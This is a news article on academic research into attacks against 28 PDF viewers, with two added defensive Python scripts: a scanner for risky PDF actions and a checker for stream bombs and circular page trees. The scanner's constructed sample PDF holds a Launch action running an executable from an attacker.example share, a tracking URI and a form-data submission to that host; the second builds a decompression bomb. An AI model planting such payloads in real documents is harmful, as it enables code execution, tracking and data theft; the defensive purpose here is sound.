Security researchers document their exploits in picking apart 28 PDF viewers
The overwhelming majority of the most popular Windows-native PDF viewers were susceptible to multiple attack techniques that abuse standard PDF features, a team of security researchers has discovered.
Several PDF software brands were vulnerable to the most serious attacks, which resulted in local file leakage, file write access, and remote code execution (RCE), academics from Ruhr University Bochum in Germany found.
PDF viewers built into leading web browsers and applications for macOS and Linux were only vulnerable to comparatively trivial attacks like denial of service (DoS).
The viewers incorporated into Safari and Edge, meanwhile, were the sole applications among 28 tested to resist all exploits, which targeted features that “directly or indirectly allow access to a file handle”, as a blog post explains.
Susceptible to eight of 10 attack techniques, the worst culprits overall were PDF-Xchange Viewer and PDF-Xchange Viewer for Windows.
PDFelement and iSkysoft, prone only to DoS, were honorable exceptions to the otherwise unimpressive Windows scorecard.
Code execution by design
“I was surprised how many viewers did straightforwardly implement ‘code execution by design’ – because they simply followed the PDF reference and thereby introduced a dangerous feature (the ‘Launch action’) without, [for example], correctly asking the user for confirmation,” Jens Müller, one of the researchers, said in an interview.
The blog post describes how, against six of the 18 Windows viewers probed, the file launched by such an action could successfully “be specified by a local path, a network share, a URL, or a file embedded within the PDF document itself”.
Information disclosure attacks, meanwhile, might be used to track PDF document use “by silently invoking a connection to the attacker’s server once the file is opened, or to leak PDF document form data, local files, or NTLM credentials to the attacker”.
The most dangerous technique, successfully deployed against three Windows viewers and partially successful against another three, exploited various methods defined by the PDF standard for embedding external files or accessing files on the host’s file system.
“If a malicious document managed to firstly read files from the victim’s disk and secondly, send them back to the attacker, such behavior would arguably be critical,” reads the blog post.
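The features described above can be spotted before a document is ever opened in a viewer. The following Python script is an added example, not code from the researchers or from the blog post: it scans the raw bytes of a PDF for the action types (Launch, SubmitForm, ImportData, GoToR, URI, JavaScript) and the trigger and attachment keys (OpenAction, AA, EmbeddedFile) that give a document a route to a file handle or to the network, resolves the `#xx` name escapes that would otherwise hide a keyword, and reports any path or URL found in the same object. The sample document and the `attacker.example` host are constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Action types (matched as "/S /Name") and trigger/attachment keys from the PDF standard
# that give a document a route to a file handle or to the network.
DESCRIPTIONS: Dict[str, str] = {
    "Launch": "Launch action: opens a file given by local path, network share, URL or embedded file",
    "SubmitForm": "SubmitForm action: posts form data to a URL (tracking, data leakage)",
    "ImportData": "ImportData action: reads form data from a file on the local system",
    "GoToR": "GoToR action: opens another document given by path or URL",
    "URI": "URI action: contacts a remote server when triggered",
    "JavaScript": "JavaScript action: script with access to document and form data",
    "OpenAction": "OpenAction: the referenced action runs as soon as the document is opened",
    "AA": "Additional-actions dictionary: actions fired by document or page events",
    "EmbeddedFile": "Embedded file stream: an attached file that a Launch action can target",
    "EmbeddedFiles": "EmbeddedFiles name tree: the document carries attachments",
}

ACTION_TYPE = re.compile(rb"/S\s*/(Launch|SubmitForm|ImportData|GoToR|URI|JavaScript)(?![A-Za-z0-9])")
TRIGGER_KEY = re.compile(rb"/(OpenAction|AA|EmbeddedFiles?)(?![A-Za-z0-9])")
NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
# /F, /UF or /URI followed by a literal string: a hint at what the action targets
TARGET_HINT = re.compile(rb"/(?:F|UF|URI)\s*\(((?:\\.|[^\\)])*)\)")


@dataclass
class Finding:
    name: str          # action type or dictionary key
    offset: int        # byte offset in the name-normalised file
    target: str        # path/URL hint found in the same object, "" if none
    description: str


def normalize_names(data: bytes) -> bytes:
    """Resolve #xx escapes so e.g. /Laun#63h cannot hide /Launch from the scan.
    Applied to the whole file, so it also touches strings and streams; for a
    keyword scan that can only cause a false positive, never a miss."""
    return NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def pdf_string(raw: bytes) -> str:
    """Undo the escapes that matter for paths and URLs in a PDF literal string."""
    return re.sub(rb"\\([\\()])", rb"\1", raw).decode("latin-1")


def scan_pdf(data: bytes) -> List[Finding]:
    """Return every risky action/trigger in file order, with a target hint where one exists."""
    text = normalize_names(data)
    findings: List[Finding] = []
    for pattern in (ACTION_TYPE, TRIGGER_KEY):
        for m in pattern.finditer(text):
            name = m.group(1).decode("ascii")
            # only look for a target inside the same object
            end = text.find(b"endobj", m.end())
            window = text[m.end(): end if end != -1 else m.end() + 512]
            hint = TARGET_HINT.search(window)
            target = pdf_string(hint.group(1)) if hint else ""
            findings.append(Finding(name, m.start(), target, DESCRIPTIONS[name]))
    return sorted(findings, key=lambda f: f.offset)


# Constructed sample (not a real-world file): wired to launch an executable from a
# network share on open, phone home through a link annotation, and submit its form
# data when the page is opened. The Launch name is #-escaped to test the normaliser.
SAMPLE_PDF = rb"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R /AcroForm << /Fields [6 0 R] >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [5 0 R] /AA << /O 7 0 R >> >> endobj
4 0 obj << /Type /Action /S /Laun#63h /Win << /F (\\\\attacker.example\\share\\payload.exe) >> >> endobj
5 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 10 10] /A << /S /URI /URI (http://attacker.example/track?id=42) >> >> endobj
6 0 obj << /FT /Tx /T (name) /V (alice) >> endobj
7 0 obj << /S /SubmitForm /F (http://attacker.example/collect) /Flags 4 >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for f in scan_pdf(SAMPLE_PDF):
        print(f"{f.offset:6d}  {f.name:<13} {f.target or '-'}\n        {f.description}")
```

Two caveats for anyone using this as a triage step: it reads the raw file, so objects packed into compressed object streams (common in PDF 1.5 and later) are not seen until they are inflated, and a hit is not a verdict, since link annotations legitimately use URI actions and many forms legitimately submit data. What the scan does give is the list of objects a reviewer should look at before deciding whether to open the file in a native viewer at all.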
Data manipulation attacks
Data manipulation attacks involve silently modifying form data, displaying different content depending on the application used to open the document, and exploiting ambiguity in how the PDF standard allows form data to be submitted to external web servers so as to write to local files on the host’s file system.
Attackers successfully executed one or both DoS techniques against every single application, bar the Safari and Edge viewers. This included exploiting how document elements reference themselves and other similar elements to cause an ‘infinite loop’, and a twist on the ‘zip bomb’ attack that compresses stream objects rather than zip files.
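Both denial-of-service techniques have the same defence: never trust the document's own bookkeeping. The Python below is an added example, not code from the study or its authors. It inflates each FlateDecode stream under a hard output cap and flags streams that hit the cap or expand more than a hundredfold, which is the stream-object variant of the zip bomb, and it walks the page tree with a visited set instead of recursing blindly on /Kids or believing /Count, so a self-referencing node is reported rather than looped on forever. The sample document, the 1 MiB cap and the 100x threshold are assumptions made for the example.

```python
import re
import zlib
from typing import Dict, List, Tuple

MAX_INFLATED = 1 << 20   # cap on decompressed bytes per stream (1 MiB; assumption for the example)
MAX_RATIO = 100.0        # expansion factor above which a stream is treated as a bomb

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)endobj", re.DOTALL)
REF_RE = re.compile(rb"(\d+)\s+\d+\s+R\b")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def parse_objects(data: bytes) -> Dict[int, bytes]:
    """Map object number -> object body for an uncompressed, classic-xref PDF."""
    return {int(m.group(1)): m.group(2) for m in OBJ_RE.finditer(data)}


def inflate_bounded(raw: bytes, limit: int = MAX_INFLATED) -> Tuple[bytes, bool]:
    """Inflate at most `limit` bytes. The flag is True when zlib still had more to
    give, i.e. the stream would have grown past the cap."""
    d = zlib.decompressobj()
    try:
        out = d.decompress(raw, limit)
    except zlib.error:
        return b"", False          # malformed stream: a different problem, not a bomb
    return out, len(out) >= limit and not d.eof


def check_streams(objects: Dict[int, bytes]) -> List[dict]:
    """Flag FlateDecode streams that exceed the cap or expand suspiciously far."""
    report: List[dict] = []
    for num, body in objects.items():
        if b"/FlateDecode" not in body:
            continue
        m = STREAM_RE.search(body)
        if not m:
            continue
        raw = m.group(1)
        out, hit_limit = inflate_bounded(raw)
        ratio = len(out) / max(len(raw), 1)
        if hit_limit or ratio > MAX_RATIO:
            report.append({"obj": num, "compressed": len(raw), "inflated": len(out),
                           "hit_limit": hit_limit, "ratio": round(ratio, 1)})
    return report


def walk_pages(objects: Dict[int, bytes], root: int) -> Tuple[int, bool]:
    """Count leaf pages without trusting /Count. In a well-formed tree no node is
    reached twice, so any revisit marks a malformed (here: circular) tree and the
    walk simply skips it instead of recursing until the stack blows."""
    visited, stack, pages, loop = set(), [root], 0, False
    while stack:
        num = stack.pop()
        if num in visited:
            loop = True
            continue
        visited.add(num)
        body = objects.get(num, b"")
        if re.search(rb"/Type\s*/Pages\b", body):
            kids = re.search(rb"/Kids\s*\[(.*?)\]", body, re.DOTALL)
            if kids:
                stack.extend(int(r) for r in REF_RE.findall(kids.group(1)))
        elif re.search(rb"/Type\s*/Page\b", body):
            pages += 1
    return pages, loop


def analyze(data: bytes) -> dict:
    """Locate the page tree through the trailer and catalog, then run both checks."""
    objects = parse_objects(data)
    root = re.search(rb"/Root\s+(\d+)\s+\d+\s+R", data)
    pages_ref = None
    if root:
        m = re.search(rb"/Pages\s+(\d+)\s+\d+\s+R", objects.get(int(root.group(1)), b""))
        pages_ref = int(m.group(1)) if m else None
    pages, loop = walk_pages(objects, pages_ref) if pages_ref is not None else (0, False)
    return {"pages": pages, "page_tree_loop": loop, "suspicious_streams": check_streams(objects)}


def build_sample() -> bytes:
    """Constructed sample (not a real-world file): a circular page tree plus a
    FlateDecode stream that inflates 8 MiB of zeros from a few KiB."""
    bomb = zlib.compress(b"\0" * (8 << 20))
    parts = [
        b"%PDF-1.7\n",
        b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n",
        b"2 0 obj << /Type /Pages /Kids [3 0 R 4 0 R] /Count 2 >> endobj\n",
        b"3 0 obj << /Type /Page /Parent 2 0 R /Contents 5 0 R >> endobj\n",
        # node 4 lists itself and its own parent as children
        b"4 0 obj << /Type /Pages /Kids [4 0 R 2 0 R] /Count 1 >> endobj\n",
        b"5 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(bomb), bomb,
        b"\nendstream\nendobj\n",
        b"trailer << /Root 1 0 R >>\n%%EOF\n",
    ]
    return b"".join(parts)


if __name__ == "__main__":
    print(analyze(build_sample()))
```

The same two ideas (a byte budget on every inflate call and a visited set on every reference walk) are what separate the viewers that shrugged off the DoS cases from the ones that hung, and they apply to any other self-referential structure in the format, not just the page tree.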
A better choice
Müller said the “more severe issues should be fixed by now”, while “less impactful issues like form modification are basically features”, and are therefore unlikely to be remedied.
He suggests that applications built into browsers, which provide sandboxing protections, “may be a far better choice for a suspicious document than a native third-party PDF viewer”.
The research also highlights an education gap around the risks posed by what Müller refers to as “a quite complex data format with tons of interesting features”.
“For example, people are aware that Office files (e.g. in email attachments) can contain macros, but general knowledge of comparable functionality in PDF documents is less widespread,” he noted.